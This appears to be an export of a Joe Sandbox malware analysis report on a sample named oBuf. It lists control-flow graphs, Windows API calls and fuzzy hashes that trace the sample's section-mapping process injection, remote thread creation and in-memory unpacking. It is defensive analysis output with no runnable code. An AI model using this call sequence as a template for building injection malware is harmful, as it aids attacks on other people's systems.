                                                                                                                                control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 422 4018c8 418->422 423 4018b9-4018c4 418->423 419->418 428 4015d5-4015ec NtDuplicateObject 419->428 422->423 424 4018cb-4018ff call 4011a4 422->424 423->424 428->418 430 4015f2-401616 NtCreateSection 428->430 432 401672-401698 NtCreateSection 430->432 433 401618-401639 NtMapViewOfSection 430->433 432->418 434 40169e-4016a2 432->434 433->432 436 40163b-401657 NtMapViewOfSection 433->436 434->418 437 4016a8-4016c9 NtMapViewOfSection 434->437 436->432 439 401659-40166f 436->439 437->418 440 4016cf-4016eb NtMapViewOfSection 437->440 439->432 440->418 442 4016f1 call 4016f6 440->442
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                                • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                                • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                                • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1921587553-0
                                                                                                                                • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                                • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                                • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                                • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 464 79143f-791458 465 79145a-79145c 464->465 466 79145e 465->466 467 791463-79146f CreateToolhelp32Snapshot 465->467 466->467 468 79147f-79148c Module32First 467->468 469 791471-791477 467->469 470 79148e-79148f call 7910fe 468->470 471 791495-79149d 468->471 469->468 475 791479-79147d 469->475 476 791494 470->476 475->465 475->468 476->471
                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00791467
                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00791487
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994949567.000000000078E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078E000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_78e000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                • Instruction ID: a256da013ce39b302e375b82945d78623235cf873005648d80f29bb184672b68
                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                • Instruction Fuzzy Hash: 06F0FC312007517BDB203BF8B88DB6E76E8AF4C724F500128E656921D0DB74EC454750

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 134 6a003c-6a0047 135 6a0049 134->135 136 6a004c-6a0263 call 6a0a3f call 6a0e0f call 6a0d90 VirtualAlloc 134->136 135->136 151 6a028b-6a0292 136->151 152 6a0265-6a0289 call 6a0a69 136->152 154 6a02a1-6a02b0 151->154 156 6a02ce-6a03c2 VirtualProtect call 6a0cce call 6a0ce7 152->156 154->156 157 6a02b2-6a02cc 154->157 163 6a03d1-6a03e0 156->163 157->154 164 6a0439-6a04b8 VirtualFree 163->164 165 6a03e2-6a0437 call 6a0ce7 163->165 167 6a04be-6a04cd 164->167 168 6a05f4-6a05fe 164->168 165->163 170 6a04d3-6a04dd 167->170 171 6a077f-6a0789 168->171 172 6a0604-6a060d 168->172 170->168 174 6a04e3-6a0505 170->174 175 6a078b-6a07a3 171->175 176 6a07a6-6a07b0 171->176 172->171 177 6a0613-6a0637 172->177 185 6a0517-6a0520 174->185 186 6a0507-6a0515 174->186 175->176 178 6a086e-6a08be LoadLibraryA 176->178 179 6a07b6-6a07cb 176->179 180 6a063e-6a0648 177->180 184 6a08c7-6a08f9 178->184 182 6a07d2-6a07d5 179->182 180->171 183 6a064e-6a065a 180->183 187 6a07d7-6a07e0 182->187 188 6a0824-6a0833 182->188 183->171 189 6a0660-6a066a 183->189 191 6a08fb-6a0901 184->191 192 6a0902-6a091d 184->192 193 6a0526-6a0547 185->193 186->193 194 6a07e2 187->194 195 6a07e4-6a0822 187->195 190 6a0839-6a083c 188->190 196 6a067a-6a0689 189->196 190->178 197 6a083e-6a0847 190->197 191->192 200 6a054d-6a0550 193->200 194->188 195->182 198 6a068f-6a06b2 196->198 199 6a0750-6a077a 196->199 201 6a084b-6a086c 197->201 202 6a0849 197->202 203 6a06ef-6a06fc 198->203 204 6a06b4-6a06ed 198->204 199->180 206 6a05e0-6a05ef 200->206 207 6a0556-6a056b 200->207 201->190 202->178 208 6a074b 203->208 209 6a06fe-6a0748 203->209 204->203 206->170 210 6a056f-6a057a 207->210 211 6a056d 207->211 208->196 209->208 212 6a059b-6a05bb 210->212 213 6a057c-6a0599 210->213 211->206 218 6a05bd-6a05db 212->218 213->218 218->200
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                • Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                • Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                                • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994456537.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099061454-3916222277
                                                                                                                                • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                                • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                                • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                                • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 477 6a0e0f-6a0e24 SetErrorMode * 2 478 6a0e2b-6a0e2c 477->478 479 6a0e26 477->479 479->478
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                • Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                • Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                                • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                                • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                                • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 537 7910fe-791138 call 791411 540 79113a-79116d VirtualAlloc call 79118b 537->540 541 791186 537->541 543 791172-791184 540->543 541->541 543->541
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0079114F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994949567.000000000078E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078E000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_78e000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                • Instruction ID: 7b000b3a98d8762bddc50aafa16c1a147c2f9bc5082cafefde9996752ef9b128
                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                • Instruction Fuzzy Hash: 4B112D79A40208FFDB01DF98C985E98BBF5AF08750F558094F9489B361D375EA50DB80
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                                • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                                                • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                                • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                                • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                                                • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                                • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                                • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                                                • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                                • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                                • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                                                • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                                • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                                  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4152845823-0
                                                                                                                                • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                                • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                                                • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                                • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                                                APIs
                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994456537.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocLocal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                                • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                                                • API String ID: 0-2784972518
                                                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                • Instruction ID: 950ca7b9e5abbbfde5366c66b5014f758a29023b43122d8a2dbe4e0272f0e847
                                                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                • Instruction Fuzzy Hash: 5B3137B6900609DFEB10DF99C880AAEBBF6FF49324F24504AD441A7311D771EA45CFA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                                                • Instruction ID: 1fe14f3d08a5ad6b2b8af3127fa4f425e7ffb0c359c280517f11db711c116789
                                                                                                                                • Opcode Fuzzy Hash: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                                                • Instruction Fuzzy Hash: 0A716C32400264DADB28EFBCC6CAE557370FB02F00B550BB6C5812F58ADB75B6198B96
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994949567.000000000078E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078E000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_78e000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                • Instruction ID: 99e234a8fe38c8fc06ae55e42b675e3954e367554eca6c47fe99d0c1aaf8c565
                                                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                • Instruction Fuzzy Hash: 7311A5723501009FDB54DF95ECD1FA673EAEB89324B298055ED04CB315D679EC02C7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                                                • Instruction ID: e7a2f1e1f2d18035c496875c0c2bba996cc0d18765e75913e3c7fd8bcbe23822
                                                                                                                                • Opcode Fuzzy Hash: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                                                • Instruction Fuzzy Hash: CA11533600420ADFD715EE219A89AA9BB21FB45704B5400BADE562B0C2A2BD7123970B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                                                • Instruction ID: d9f06ca26037506423ecc87bc330270b3b45d0e2ffab50e6a8e269eb556b0e13
                                                                                                                                • Opcode Fuzzy Hash: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                                                • Instruction Fuzzy Hash: 7411533640820ADFD715EE21AA89AA6BB31FB45704F5400BBDE562B0C1E2BD7123D74B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                                                • Instruction ID: 8ab6e973ac2bde56534b905b9a6112487ad567182bc04a9cefd4a17b3c0f3d42
                                                                                                                                • Opcode Fuzzy Hash: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                                                • Instruction Fuzzy Hash: A6113636504206CFDB15DF20D9895A8B722FB45704B1400BACE522B0C1E37D7113D70B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                                • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                                                                                                                                • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
